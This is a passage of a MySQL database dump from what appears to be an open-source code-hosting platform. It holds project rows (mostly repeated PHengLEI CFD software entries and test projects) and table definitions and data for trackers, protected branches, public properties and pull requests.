07:14:53','test',1,NULL,NULL,0,0,0,1,49,0,NULL,NULL,NULL,404,NULL,0,0,37,0,NULL,NULL,0,NULL,0,NULL,1,3,1,2,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(492,'test11','test','',1,NULL,'2021-02-22 07:39:24','2021-02-22 07:39:24','reack',1,NULL,NULL,0,1,0,1,49,0,NULL,NULL,NULL,NULL,NULL,0,0,4,0,NULL,NULL,0,NULL,0,NULL,2,1,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(494,'test11','qq','',1,NULL,'2021-02-22 08:29:36','2021-02-22 09:08:22','test11',1,NULL,NULL,0,0,0,1,49,0,NULL,NULL,NULL,399,NULL,1,0,36,0,NULL,NULL,0,NULL,0,NULL,2,3,2,3,1,1,3,1,NULL,1,1,0,0,NULL,0,0,0),(495,'test11','qq','',1,NULL,'2021-02-22 09:06:57','2021-02-22 09:06:57','test11',1,NULL,NULL,0,0,0,1,73,0,NULL,NULL,NULL,NULL,494,0,0,12,0,NULL,NULL,0,NULL,0,NULL,2,3,2,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(496,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-02-25 01:18:01','2021-02-25 01:18:01','PHengLEI',1,NULL,NULL,0,0,0,1,182,0,NULL,NULL,NULL,NULL,477,0,0,23,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,1,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(497,'Jenkins','Gitee 的 Jenkins 插件,支持 push触发,pr的新建,更新,合并,关闭触发,可过滤分支,pr触发的构建结构可回评至PR等','',1,NULL,'2021-02-25 02:10:56','2021-02-25 02:11:06','Gitee-Jenkins-Plugin',1,NULL,NULL,0,1,0,1,181,0,NULL,NULL,NULL,402,NULL,0,0,7,0,NULL,NULL,0,NULL,0,NULL,8,11,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(500,'前端react-V0.1-特殊','前端react-V0.1-特殊前端react-V0.1-特殊前端react-V0.1-特殊前端react-V0.1-特殊前端react-V0.1-特殊','',0,NULL,'2021-02-25 09:23:46','2021-02-25 09:23:46','special',1,NULL,NULL,0,0,0,1,128,0,NULL,NULL,NULL,NULL,430,0,0,10,0,NULL,NULL,0,NULL,0,NULL,6,3,360,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(501,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-02-26 00:33:20','2021-02-26 00:33:20','PHengLEI',1,NULL,NULL,0,0,0,1,181,0,NULL,NULL,NULL,NULL,477,0,0,10,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(503,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-01 07:22:50','2021-03-01 07:22:50','PHengLEI',1,NULL,NULL,0,0,0,1,179,0,NULL,NULL,NULL,NULL,477,0,0,23,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(504,'2021','问题汇总','',1,NULL,'2021-03-01 08:21:53','2021-03-01 08:21:53','issue',1,NULL,NULL,0,0,0,1,1,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,NULL,NULL,0,NULL,0,NULL,8,1,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(505,'testSimple','testSimpletestSimple','',0,NULL,'2021-03-04 07:21:41','2021-03-04 07:21:41','testSimple',1,NULL,NULL,0,0,0,1,48,0,NULL,NULL,NULL,410,NULL,0,0,12,0,NULL,NULL,0,NULL,0,NULL,3,3,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(506,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-05 01:00:05','2021-03-05 01:00:05','PHengLEI',1,NULL,NULL,0,0,0,1,173,0,NULL,NULL,NULL,NULL,477,0,0,11,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(507,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-05 01:07:19','2021-03-05 01:07:19','PHengLEI',1,NULL,NULL,0,0,0,1,165,0,NULL,NULL,NULL,NULL,477,0,0,5,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(512,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-06 02:41:43','2021-03-06 02:41:43','PHengLEI',1,NULL,NULL,0,0,0,1,186,0,NULL,NULL,NULL,NULL,477,0,0,1,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(513,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-06 05:34:14','2021-03-06 05:34:14','PHengLEI',1,NULL,NULL,0,0,0,1,206,0,NULL,NULL,NULL,NULL,477,0,0,2,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(514,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-06 10:12:34','2021-03-06 10:12:34','PHengLEI',1,NULL,NULL,0,0,0,1,171,0,NULL,NULL,NULL,NULL,477,0,0,26,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(515,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-06 12:24:24','2021-03-06 12:24:24','PHengLEI',1,NULL,NULL,0,0,0,1,189,0,NULL,NULL,NULL,NULL,477,0,0,23,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(516,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-07 09:47:22','2021-03-07 09:47:22','PHengLEI',1,NULL,NULL,0,0,0,1,162,0,NULL,NULL,NULL,NULL,477,0,0,2,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(517,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-09 08:27:31','2021-03-09 08:27:31','PHengLEI',1,NULL,NULL,0,0,0,1,190,0,NULL,NULL,NULL,NULL,477,0,0,2,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,1,1,0,0,NULL,0,0,0,0,NULL,0,0,0),(518,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-10 01:24:54','2021-03-10 01:24:54','PHengLEI',1,NULL,NULL,0,0,0,1,174,0,NULL,NULL,NULL,NULL,477,0,0,13,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(519,'test1111','11','',0,NULL,'2021-03-10 07:46:15','2021-03-10 07:46:16','test1111',1,NULL,NULL,0,0,0,1,1,0,NULL,NULL,NULL,423,NULL,0,0,7,0,NULL,NULL,0,NULL,0,NULL,1,1,1,1,0,0,0,0,NULL,0,1,0,0,NULL,0,0,0),(520,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-10 12:44:46','2021-03-10 12:44:46','PHengLEI',1,NULL,NULL,0,0,0,1,215,0,NULL,NULL,NULL,NULL,477,0,0,2,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(521,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-11 01:23:26','2021-03-11 01:23:26','PHengLEI',1,NULL,NULL,0,0,0,1,210,0,NULL,NULL,NULL,NULL,477,0,0,4,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(522,'基于知识图谱的地理信息平台','知识图谱是人工智能与虚拟地理环境知识工程相结合的桥梁。本系统结合知识图谱、地理知识图谱的研究现状,提出了地理知识图谱的构建流程,重点实现了地理知识图谱构建的关键技术,讨论和阐述了地理知识图谱的应用方向。本研究将有助于实现地理信息的知识化,提高虚拟地理环境系统的智能化服务水平。','',1,NULL,'2021-03-11 03:49:28','2021-03-11 03:49:28','geo_info_platform',1,NULL,NULL,0,0,0,1,181,0,NULL,NULL,NULL,NULL,370,0,0,1,0,NULL,NULL,0,NULL,0,NULL,4,11,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(523,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-11 06:49:44','2021-03-11 06:49:44','PHengLEI',1,NULL,NULL,0,0,0,1,216,0,NULL,NULL,NULL,NULL,477,0,0,26,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(524,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-11 07:12:57','2021-03-11 07:12:57','PHengLEI',1,NULL,NULL,0,0,0,1,218,0,NULL,NULL,NULL,NULL,477,0,0,1,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(525,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-03-15 02:11:41','2021-03-15 02:11:41','PHengLEI',1,NULL,NULL,0,0,0,1,194,0,NULL,NULL,NULL,NULL,477,0,0,6,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0);
|
||
/*!40000 ALTER TABLE `projects` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `projects_trackers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `projects_trackers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `projects_trackers` (
|
||
`project_id` int(11) NOT NULL DEFAULT '0',
|
||
`tracker_id` int(11) NOT NULL DEFAULT '0',
|
||
UNIQUE KEY `projects_trackers_unique` (`project_id`,`tracker_id`),
|
||
KEY `projects_trackers_project_id` (`project_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `projects_trackers`
|
||
--
|
||
|
||
LOCK TABLES `projects_trackers` WRITE;
|
||
/*!40000 ALTER TABLE `projects_trackers` DISABLE KEYS */;
|
||
INSERT INTO `projects_trackers` VALUES (25,1),(25,2),(25,3),(25,4),(25,5),(28,1),(28,2),(28,3),(28,4),(28,5),(29,1),(29,2),(29,3),(29,4),(29,5),(31,1),(31,2),(31,3),(31,4),(31,5),(32,1),(32,2),(32,3),(32,4),(32,5),(34,1),(34,2),(34,3),(34,4),(34,5),(38,1),(38,2),(38,3),(38,4),(38,5),(41,1),(41,2),(41,3),(41,4),(41,5),(42,1),(42,2),(42,3),(42,4),(42,5),(43,1),(43,2),(43,3),(43,4),(43,5),(54,1),(54,2),(54,3),(54,4),(54,5),(57,1),(57,2),(57,3),(57,4),(57,5),(58,1),(58,2),(58,3),(58,4),(58,5),(59,1),(59,2),(59,3),(59,4),(59,5),(60,1),(60,2),(60,3),(60,4),(60,5),(61,1),(61,2),(61,3),(61,4),(61,5),(62,1),(62,2),(62,3),(62,4),(62,5),(63,1),(63,2),(63,3),(63,4),(63,5),(64,1),(64,2),(64,3),(64,4),(64,5),(65,1),(65,2),(65,3),(65,4),(65,5),(66,1),(66,2),(66,3),(66,4),(66,5),(67,1),(67,2),(67,3),(67,4),(67,5),(69,1),(69,2),(69,3),(69,4),(69,5),(70,1),(70,2),(70,3),(70,4),(70,5),(73,1),(73,2),(73,3),(73,4),(73,5),(76,1),(76,2),(76,3),(76,4),(76,5),(78,1),(78,2),(78,3),(78,4),(78,5),(79,1),(79,2),(79,3),(79,4),(79,5),(80,1),(80,2),(80,3),(80,4),(80,5),(81,1),(81,2),(81,3),(81,4),(81,5),(82,1),(82,2),(82,3),(82,4),(82,5),(99,1),(99,2),(99,3),(99,4),(99,5),(100,1),(100,2),(100,3),(100,4),(100,5),(101,1),(101,2),(101,3),(101,4),(101,5),(102,1),(102,2),(102,3),(102,4),(102,5),(103,1),(103,2),(103,3),(103,4),(103,5),(120,1),(120,2),(120,3),(120,4),(120,5),(127,1),(127,2),(127,3),(127,4),(127,5),(129,1),(129,2),(129,3),(129,4),(129,5),(130,1),(130,2),(130,3),(130,4),(130,5),(131,1),(131,2),(131,3),(131,4),(131,5),(132,1),(132,2),(132,3),(132,4),(132,5),(137,1),(137,2),(137,3),(137,4),(137,5),(139,1),(139,2),(139,3),(139,4),(139,5),(140,1),(140,2),(140,3),(140,4),(140,5),(141,1),(141,2),(141,3),(141,4),(141,5),(143,1),(143,2),(143,3),(143,4),(143,5),(144,1),(144,2),(144,3),(144,4),(144,5),(156,1),(156,2),(156,3),(156,4),(156,5),(157,1),(157,2),(157,3),(157,4),(157,5),(158,1),(158,2),(158,3),(158,4),(158,5),(159,1),(159,2),(159,3),(159,4),(159,5),(169,1),(169,2),(169,3),(169,4),(169,5),(178,1),(178,2),(178,3),(178,4),(178,5),(199,1),(199,2),(199,3),(199,4),(199,5),(200,1),(200,2),(200,3),(200,4),(200,5),(203,1),(203,2),(203,3),(203,4),(203,5),(204,1),(204,2),(204,3),(204,4),(204,5),(205,1),(205,2),(205,3),(205,4),(205,5),(217,1),(217,2),(217,3),(217,4),(217,5),(219,1),(219,2),(219,3),(219,4),(219,5),(221,1),(221,2),(221,3),(221,4),(221,5),(223,1),(223,2),(223,3),(223,4),(223,5),(224,1),(224,2),(224,3),(224,4),(224,5),(225,1),(225,2),(225,3),(225,4),(225,5),(226,1),(226,2),(226,3),(226,4),(226,5),(228,1),(228,2),(228,3),(228,4),(228,5),(230,1),(230,2),(230,3),(230,4),(230,5),(231,1),(231,2),(231,3),(231,4),(231,5),(232,1),(232,2),(232,3),(232,4),(232,5),(233,1),(233,2),(233,3),(233,4),(233,5),(248,1),(248,2),(248,3),(248,4),(248,5),(250,1),(250,2),(250,3),(250,4),(250,5),(251,1),(251,2),(251,3),(251,4),(251,5),(252,1),(252,2),(252,3),(252,4),(252,5),(253,1),(253,2),(253,3),(253,4),(253,5),(254,1),(254,2),(254,3),(254,4),(254,5),(255,1),(255,2),(255,3),(255,4),(255,5),(256,1),(256,2),(256,3),(256,4),(256,5),(257,1),(257,2),(257,3),(257,4),(257,5),(258,1),(258,2),(258,3),(258,4),(258,5),(259,1),(259,2),(259,3),(259,4),(259,5),(261,1),(261,2),(261,3),(261,4),(261,5),(262,1),(262,2),(262,3),(262,4),(262,5),(263,1),(263,2),(263,3),(263,4),(263,5),(264,1),(264,2),(264,3),(264,4),(264,5),(265,1),(265,2),(265,3),(265,4),(265,5),(266,1),(266,2),(266,3),(266,4),(266,5),(267,1),(267,2),(267,3),(267,4),(267,5),(268,1),(268,2),(268,3),(268,4),(268,5),(269,1),(269,2),(269,3),(269,4),(269,5),(270,1),(270,2),(270,3),(270,4),(270,5),(271,1),(271,2),(271,3),(271,4),(271,5),(272,1),(272,2),(272,3),(272,4),(272,5),(273,1),(273,2),(273,3),(273,4),(273,5),(274,1),(274,2),(274,3),(274,4),(274,5);
|
||
/*!40000 ALTER TABLE `projects_trackers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `protected_branches`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `protected_branches`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `protected_branches` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`repo_id` int(11) DEFAULT NULL,
|
||
`branch_name` varchar(255) DEFAULT '',
|
||
`can_push` tinyint(1) NOT NULL DEFAULT '0',
|
||
`enable_whitelist` tinyint(1) DEFAULT '0',
|
||
`whitelist_user_i_ds` text,
|
||
`whitelist_team_i_ds` text,
|
||
`enable_merge_whitelist` tinyint(1) NOT NULL DEFAULT '0',
|
||
`whitelist_deploy_keys` tinyint(1) NOT NULL DEFAULT '0',
|
||
`merge_whitelist_user_i_ds` text,
|
||
`merge_whitelist_team_i_ds` text,
|
||
`enable_status_check` tinyint(1) NOT NULL DEFAULT '0',
|
||
`status_check_contexts` text,
|
||
`approvals_whitelist_user_i_ds` text,
|
||
`approvals_whitelist_team_i_ds` text,
|
||
`required_approvals` int(11) DEFAULT '0',
|
||
`enable_approvals_whitelist` tinyint(1) NOT NULL DEFAULT '0',
|
||
`block_on_rejected_reviews` tinyint(1) NOT NULL DEFAULT '0',
|
||
`dismiss_stale_approvals` tinyint(1) NOT NULL DEFAULT '0',
|
||
`require_signed_commits` tinyint(1) NOT NULL DEFAULT '0',
|
||
`protected_file_patterns` text,
|
||
`block_on_outdated_branch` tinyint(1) NOT NULL DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_protected_branches_on_repo_id` (`repo_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `protected_branches`
|
||
--
|
||
|
||
LOCK TABLES `protected_branches` WRITE;
|
||
/*!40000 ALTER TABLE `protected_branches` DISABLE KEYS */;
|
||
INSERT INTO `protected_branches` VALUES (1,531,'dev',0,0,NULL,NULL,0,0,NULL,NULL,0,NULL,NULL,NULL,0,0,0,0,0,NULL,0,'2021-01-22 08:33:37','2021-01-22 08:33:37'),(2,531,'master',1,1,'---\n- 155\n',NULL,1,0,'---\n- 155\n',NULL,1,NULL,NULL,NULL,0,0,0,0,0,NULL,1,'2021-01-22 08:33:47','2021-01-22 08:37:13'),(3,535,'master',0,0,NULL,NULL,0,0,NULL,NULL,0,NULL,NULL,NULL,0,0,0,0,0,NULL,0,'2021-01-26 02:10:21','2021-01-26 02:10:21');
|
||
/*!40000 ALTER TABLE `protected_branches` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `public_properties`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `public_properties`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `public_properties` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`property` varchar(255) DEFAULT NULL,
|
||
`value` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `public_properties`
|
||
--
|
||
|
||
LOCK TABLES `public_properties` WRITE;
|
||
/*!40000 ALTER TABLE `public_properties` DISABLE KEYS */;
|
||
INSERT INTO `public_properties` VALUES (1,'Tel','','2019-01-17 19:29:06','2019-01-17 19:44:04'),(2,'Email','','2019-01-17 19:29:06','2019-01-17 19:29:06'),(3,'Address','','2019-01-17 19:29:06','2019-01-17 19:29:06'),(4,'Copyright','可控开源讨论社区','2019-01-17 19:29:06','2019-01-17 20:15:01');
|
||
/*!40000 ALTER TABLE `public_properties` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `pull_request_assigns`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `pull_request_assigns`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `pull_request_assigns` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`pull_request_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`user_login` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_pull_request_assigns_on_user_id_and_pull_request_id` (`pull_request_id`),
|
||
KEY `index_pull_request_assigns_on_user_login` (`user_login`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `pull_request_assigns`
|
||
--
|
||
|
||
LOCK TABLES `pull_request_assigns` WRITE;
|
||
/*!40000 ALTER TABLE `pull_request_assigns` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `pull_request_assigns` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `pull_request_tags`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `pull_request_tags`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `pull_request_tags` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`issue_tag_id` int(11) DEFAULT NULL,
|
||
`pull_request_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
